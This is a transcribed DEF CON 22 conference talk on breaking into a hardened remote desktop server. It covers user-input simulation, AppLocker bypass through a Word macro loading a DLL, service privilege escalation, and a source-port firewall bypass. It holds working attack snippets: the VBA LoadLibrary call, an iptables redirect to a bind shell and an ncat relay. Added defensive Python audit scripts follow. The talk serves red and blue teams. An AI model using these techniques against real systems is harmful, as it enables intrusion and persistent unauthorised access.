Bypass firewalls, application white lists, secure remote desktops in 20 seconds
Zoltan Balazs
DEF CON 22, 2014

root@kali:~# whoami
Zoltan Balazs
AV testing
AV bypass
OSCP: Occasional Satire Captain Punk
CISSP: Certified Interspecie-ial Sheep Shearing Professional
CPTS: Certified Pajama Toaster Specialist
MCP: Microsoft Certified Psychopath
OSWP: Official Sexiest Weasel Popstar
CHFI: Chronic Hopeless Flux Incompetent
I'm NOT a CEH
CyberLympics 2012 CTF: 2nd runners up, gula.sh
Creator of the Zombie Browser Toolkit
https://github.com/Z6543/ZombieBrowserPack
Hungary
I love hacking

How do you hack high security systems when you are not Tom Cruise?

The mission
I'm a spy (with low budget)
I want access to a hardened secure RDP (remote desktop) server
E.g. server contains confidential documents
I need persistent C&C access to the RDP server
To upload/download files
Interactive remote code execution

The solution (in an ideal world)
[Diagram: Infected workstation → Secure remote desktop server]
1. Infect client's desktop
2. Steal RDP password
3. Connect to RDP
4. Drop malware
5. Command and Control
6. Profit

The challenges
RDP server is not reachable from the Internet directly
Two factor authentication is used to access the RDP server
No access to the token seeds ;)
Drive mapping disabled, no direct file copy
Restrictive hardware firewall
Allows workstation → server TCP port 3389, IPv4 only
Application white list is used on the RDP server
M$ Applocker in my case with default policy
[Diagram: Firewall, port 3389 allowed only]

Is this realistic?
Similar environment at a client
Had no time to hack it
[Diagram: Attacker on the Internet → infected workstation inside the target company → Firewall, port 3389 allowed only → Secure remote desktop server]

In hacking, there is no such thing as impossible. Only things that are more challenging.

Already achieved
I have remote code execution with C&C on a user's workstation
I have access to a test RDP server
I know how the files on the server look like, what services are installed
This is Spartaaaa post-exploitation

Why should you care about this?
Red team/pentester: New tools
Blue team: New things to look for during log analysis/incident response
Policy maker/business: Funny pictures

Divide et impera!
Divide the problem into smaller pieces and rule them all, one by one
1. drop malware into the RDP server: new shiny tool
2. execute any code on RDP server: nothing new here
3. elevate to admin privileges: nothing new, no 0day for you
4. bypass hardware firewall: new shiny tool

1. Drop malware into RDP server
Malware waits for the user to connect to RDP server
Creates screenshot (or new animation), shows it in foreground
Optionally blocks user keyboard, mouse ~20 seconds
Uses the keyboard and the clipboard, simulates the user:
1. Starts M$ Word on RDP server
2. Drops encoded ASCII payload
3. Creates Macro code
4. Macro writes binary
5. Macro starts binaries

Alternative usage of user simulator
1. Add directory to be excluded from AV scans: use the AV GUI!
   only if the user has the privileges and no UAC
2. Install new trusted root certification authority and accept warning: MiTM SSL connections
   CA pinning does not stop this attack

The AV is alive.
Nope, Chuck Testa.

2. Execute any code, bypass Applocker
What is AppLocker?
AppLocker can only control VBScript, JScript, .bat files, .cmd files and Windows PowerShell scripts. It does not control all interpreted code that runs within a host process, for example Perl scripts and macros.
Applications could contain flags that are passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll file to be loaded.
The administrator on the local computer can modify the AppLocker policies defined in the local GPO.

Execute any code, bypass Applocker
Load DLL with Word Macro!
Even shellcode execution is possible!
http://blog.didierstevens.com/2008/06/05/bpmtk-how-about-srp-whitelists/

    ' Module-level import of LoadLibraryA from kernel32. PtrSafe marks the declaration as
    ' 64-bit safe; the handle is returned as LongPtr (the slide used Long, which truncates
    ' handles under 64-bit Office).
    Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
    Dim hLibrary As LongPtr
    ' outputdir holds the folder the macro wrote the DLL into (set earlier in the macro)
    hLibrary = LoadLibrary(outputdir & "\hack_service.dll")

3. Elevate to admin
Why do I need admin?
It is needed for the last phase, hardware firewall bypass
Possibilities
Local priv esc zero day for Win 2012
Exploit unpatched vulnerability
Exploit vulnerable 3rd party program/service
Etc.
Processes started with admin (or higher) privileges are not restricted by AppLocker!

Elevate to admin - Service exploit

C:\> accesschk.exe -l myvulnservice.exe
[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\TERMINAL SERVER USER
    FILE_APPEND_DATA
    FILE_EXECUTE
    FILE_READ_ATTRIBUTES
    FILE_READ_DATA
    FILE_READ_EA
    FILE_WRITE_ATTRIBUTES
    FILE_WRITE_DATA
    FILE_WRITE_EA
    SYNCHRONIZE
    READ_CONTROL

C:\> sc sdshow myvulnservice
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRCRPWP;;;IU)(A;;CCLCSWLOCRRC;;;SU)
Highlighted on the slide: the IU ACE (interactively logged on user) allows service start (RP) and service stop (WP).

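The two listings above are exactly what a defender should be grepping for before an attacker does. The following is an added example (not code from the presentation or from the hwfwbypass project) that parses the `sc sdshow` SDDL string and the `accesschk -l` output shown on the slide and flags the weak-service combination: a non-administrative principal that may start or stop the service, plus a service binary that the same kind of principal can write. The service name myvulnservice is the slide's hypothetical one; the SDDL token names are the standard service-object rights, and the "trusted" principal sets and the choice of which rights count as risky are this example's own heuristics, to be tuned per environment.

```python
import re

# SDDL access-right tokens as they apply to service objects (sc sdshow output).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
# Rights that let the holder start/stop, reconfigure, delete or re-ACL the service (heuristic).
RISKY_SERVICE_RIGHTS = ("RP", "WP", "DC", "SD", "WD", "WO", "GA", "GW")
# Well-known SID aliases expected to hold such rights (heuristic; extend per environment).
TRUSTED_SIDS = {"SY", "BA", "LA"}

# File rights that allow replacing or re-ACLing the service binary (heuristic).
RISKY_FILE_RIGHTS = ("FILE_WRITE_DATA", "FILE_APPEND_DATA", "DELETE", "WRITE_DAC", "WRITE_OWNER")
TRUSTED_PRINCIPALS = ("NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "NT SERVICE\\TrustedInstaller")

# The two outputs shown on the slide, for the hypothetical service myvulnservice.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRCRPWP;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
SAMPLE_ACCESSCHK = """\
[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\\TERMINAL SERVER USER
    FILE_APPEND_DATA
    FILE_EXECUTE
    FILE_READ_ATTRIBUTES
    FILE_READ_DATA
    FILE_READ_EA
    FILE_WRITE_ATTRIBUTES
    FILE_WRITE_DATA
    FILE_WRITE_EA
    SYNCHRONIZE
    READ_CONTROL
"""


def parse_sddl_dacl(sddl):
    """Split the D: part of an SDDL string into ACE dicts (type, flags, rights tokens, SID)."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # ignore a trailing SACL if present
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        fields = body.split(";")
        if len(fields) != 6:
            continue
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        # Rights are either a run of two-letter tokens or a single hex mask.
        tokens = [rights] if rights.startswith("0x") else [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "rights": tokens, "sid": sid})
    return aces


def audit_service_sddl(sddl):
    """Report allow-ACEs that give non-administrative principals control over the service."""
    findings = []
    for ace in parse_sddl_dacl(sddl):
        if ace["type"] != "A" or ace["sid"] in TRUSTED_SIDS:
            continue
        risky = [r for r in ace["rights"] if r in RISKY_SERVICE_RIGHTS]
        if risky:
            findings.append({"sid": ace["sid"], "risky": risky,
                             "names": [SERVICE_RIGHTS[r] for r in risky]})
    return findings


def parse_accesschk(output):
    """Parse `accesschk -l` output into (ACE type, principal, rights) entries."""
    entries = []
    for line in output.splitlines():
        m = re.match(r"\s*\[\d+\]\s+(\w+_ACE_TYPE):\s+(.+?)\s*$", line)
        if m:
            entries.append({"type": m.group(1), "principal": m.group(2), "rights": []})
        elif entries and line.strip():
            entries[-1]["rights"].append(line.strip())
    return entries


def audit_file_acl(output):
    """Report allow-ACEs that let non-administrative principals modify the binary."""
    findings = []
    for entry in parse_accesschk(output):
        if entry["type"] != "ACCESS_ALLOWED_ACE_TYPE" or entry["principal"].startswith(TRUSTED_PRINCIPALS):
            continue
        risky = [r for r in entry["rights"] if r in RISKY_FILE_RIGHTS]
        if risky:
            findings.append({"principal": entry["principal"], "risky": risky})
    return findings


if __name__ == "__main__":
    print(audit_service_sddl(SAMPLE_SDDL))   # IU may SERVICE_START / SERVICE_STOP
    print(audit_file_acl(SAMPLE_ACCESSCHK))  # TERMINAL SERVER USER may write the binary
```

Run against the slide's output it reports one service finding (IU: SERVICE_START, SERVICE_STOP) and one file finding (TERMINAL SERVER USER: FILE_APPEND_DATA, FILE_WRITE_DATA). Either alone is a misconfiguration; together they are the privilege escalation path the slide uses, because whoever can overwrite the binary and restart the service gets code running as the service account, outside AppLocker's reach. Collecting `sc sdshow` for every service and `accesschk -l` for every service binary path, then feeding the output through a check like this, turns the attacker's manual enumeration into a periodic audit.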
Quiz
What's the name of the company which published the first paper about packet filter firewalls in 1988?
Hint: the company developed VAX
Digital Equipment Corporation

4. Bypass hardware firewall
Restrictive firewall
No bind shell
No reverse shell
No covert channel: DNS, ICMP, IPv6, UDP, proxy
No shell!!!
In a different scenario:
TCP socket reuse shell: possible (not persistent)
Webshell (lame): possible
But not in this case (no exploit, no webserver)

4. Bypass hardware firewall
First (bad) idea
After malware dropped, mark every packet to be special: start with magic bytes, and let a kernel network filter driver select the packets
Problem
Every (hacker) application has to be rewritten, or rerouted through a custom wrapper proxy (both server and client side)

Bypass HW firewall: second idea
Use TCP source port!
E.g. port 1337 is always special
Limitations
NAT from the attacker side
But who cares

Bypassing hardware firewalls: Linux
Use code at kernel level (with root)
if ((tcp_source_port == 1337) && (tcp_dest_port == 22)) then:
    redirect to bind shell on port 31337

    iptables -t nat -A PREROUTING -p tcp --dport 22 --sport 1337 -j REDIRECT --to-ports 31337

[Diagram: Attacker or infected workstation → Firewall, port 3389 allowed only → Secure remote desktop server. The packet leaves with src port 1337, dst port 3389; the firewall sees only dst port 3389; on the server it is redirected to dst port 31337.]

Bypassing hardware firewalls on Windows x64
Installing a kernel driver in Windows x64 is not trivial
Trusted signed driver is needed
Thanks to basil for the WinDivert project (and Nemea Software Development)
Trusted signed kernel driver already included!
You can interface with the kernel driver
Alternatively, patchguard bypass could be used
http://www.codeproject.com/Articles/28318/Bypassing-PatchGuard
Uroburos rootkit: Bring Your Own Vuln
Install root CA first with user simulator ;)

How to set TCP source port for meterpreter bind shell (or any program)?
Netcat (Nmap build) to da rescue!

    ncat -kl 4444 -c "ncat -p 1337 RDP.SER.VER.IP 3389"

Demo
Alternative usage of HW FW bypass
You have admin on a webserver but persistent outbound C&C is blocked
Instead of local port forward, use netcat to port forward to other machines in the DMZ
Backdoor traffic to hide your communication inside the legit network traffic

The solution as a whole
Malware waits for the user to login to RDP with 2FA
Create screenshot from user desktop
Put screenshot on the screen
Disable keyboard/mouse
Drop malware by simulating user keyboard events; clipboard for large (ASCII) data transfer
Start WORD, create new macro code
Bypass application whitelist using DLL loading from Word macro code
Escalate privileges to admin (vulnerable service)
Install hwfwbypass.exe with kernel driver
Drop meterpreter
Profit!

Demo
Demo 2 as seen by the user
Lessons learned for the red team
You have two new tools for your post exploitation
Tool to drop malware into the remote desktop
If you have admin on a Windows server, you can bypass/fool hardware firewalls using my driver

Lessons learned for the blue team
Every additional layer of security can still be bypassed
Restricted remote desktop is a real interface for malware infection
Use application/protocol aware (NG) firewall instead of port based ones
Can be bypassed ;)
Don't trust your firewall logs blindly

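What "don't trust your firewall logs blindly" means in practice for the source-port trick described on the Linux and Windows x64 slides: the firewall only ever sees an allowed connection to port 3389, so the redirect to the bind shell leaves no trace there. The following is an added example (not code from the presentation or from the hwfwbypass project) that shows the two signals that do survive, run over constructed sample data: a client that keeps reusing one hand-picked, non-ephemeral source port for new connections to the RDP server, and an unexpected listening port on the server itself. The log format (iptables-style LOG fields), the `netstat -ano` style listing, all addresses and ports, and the ephemeral-range threshold are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample of firewall LOG lines for TCP SYNs allowed through to the RDP server
# (dst port 3389).  10.1.1.50 reuses source port 1337 for every new connection, as the
# slides' bind-shell trigger does; 10.1.1.51 behaves like a normal client.
SAMPLE_FW_LOG = """\
Jun  3 10:01:02 fw kernel: ACCEPT IN=eth0 OUT=eth1 SRC=10.1.1.50 DST=10.2.2.10 PROTO=TCP SPT=1337 DPT=3389 SYN
Jun  3 10:01:05 fw kernel: ACCEPT IN=eth0 OUT=eth1 SRC=10.1.1.51 DST=10.2.2.10 PROTO=TCP SPT=52104 DPT=3389 SYN
Jun  3 10:07:41 fw kernel: ACCEPT IN=eth0 OUT=eth1 SRC=10.1.1.50 DST=10.2.2.10 PROTO=TCP SPT=1337 DPT=3389 SYN
Jun  3 10:09:12 fw kernel: ACCEPT IN=eth0 OUT=eth1 SRC=10.1.1.51 DST=10.2.2.10 PROTO=TCP SPT=52377 DPT=3389 SYN
Jun  3 10:15:55 fw kernel: ACCEPT IN=eth0 OUT=eth1 SRC=10.1.1.50 DST=10.2.2.10 PROTO=TCP SPT=1337 DPT=3389 SYN
"""

# Constructed sample of `netstat -ano` style output collected on the RDP server.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1120
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       4711
  TCP    10.2.2.10:3389         10.1.1.51:52377        ESTABLISHED     1120
"""

FLOW_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)")
LISTEN_RE = re.compile(r"^\s*TCP\s+\S+:(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$")

# Client stacks pick ephemeral source ports at or above this value (Linux default 32768,
# Windows Vista and later 49152); a lower, fixed source port is a weak signal on its own.
EPHEMERAL_MIN = 32768


def parse_syn_flows(lines):
    """Return (src, dst, dst_port, src_port) for every logged SYN, one per connection attempt."""
    flows = []
    for line in lines:
        if not line.rstrip().endswith("SYN"):
            continue
        m = FLOW_RE.search(line)
        if m:
            flows.append((m["src"], m["dst"], int(m["dpt"]), int(m["spt"])))
    return flows


def find_fixed_source_ports(lines, min_hits=3):
    """Flag clients that keep reusing one source port for new connections to the same service."""
    findings = {}
    for flow, hits in Counter(parse_syn_flows(lines)).items():
        reasons = []
        if hits >= min_hits:
            reasons.append("source port %d reused for %d new connections" % (flow[3], hits))
        if flow[3] < EPHEMERAL_MIN:
            reasons.append("source port %d below the ephemeral range" % flow[3])
        if reasons:
            findings[flow] = {"hits": hits, "reasons": reasons}
    return findings


def find_unexpected_listeners(netstat_output, allowed_ports):
    """Return (port, pid) for listening TCP sockets outside the expected set for this host."""
    unexpected = []
    for line in netstat_output.splitlines():
        m = LISTEN_RE.match(line)
        if m and int(m["port"]) not in allowed_ports:
            unexpected.append((int(m["port"]), int(m["pid"])))
    return unexpected


if __name__ == "__main__":
    for flow, info in find_fixed_source_ports(SAMPLE_FW_LOG.splitlines()).items():
        print(flow, info)
    print(find_unexpected_listeners(SAMPLE_NETSTAT, {135, 445, 3389}))
```

On the sample data the firewall check flags only the 10.1.1.50 → 10.2.2.10:3389 flow with source port 1337 (three new connections, port below the ephemeral range), and the host check returns the listener on 31337 (PID 4711). The host-side signal is the more reliable of the two: the slides themselves note that NAT on the attacker's side rewrites source ports, which also means a NAT device between client and firewall can hide the fixed-port pattern from the network log, while the bind shell still has to listen somewhere on the server. A baseline of expected listening ports per server role, compared on a schedule, catches it regardless of what the firewall saw.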
Code release now
References
http://reqrypt.org/windivert.html
http://inputsimulator.codeplex.com/ (modified)
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Tereshkin.pdf
http://blog.didierstevens.com/2011/01/24/circumventing-srp-and-applocker-by-design/
http://www.room362.com/blog/2014/01/16/application-whitelist-bypass-using-ieexec-dot-exe
http://leastprivilege.blogspot.fr/2013/04/bypass-applocker-by-loading-dlls-from.html?m=1
https://www.mandiant.com/blog/hikit-rootkit-advanced-persistent-attack-techniques-part-2/

One more thing... two more things
User simulator available as Metasploit post module
HW FW bypass available as Metasploit post module
Hack The Planet!
https://github.com/MRGEffitas/Write-into-screen
https://github.com/MRGEffitas/hwfwbypass
zoltan.balazs@mrg-effitas.com
https://hu.linkedin.com/in/zbalazs
Twitter: @zh4ck
www.slideshare.net/bz98
Greetz to hekkcamp
JumpESPJump.blogspot.com
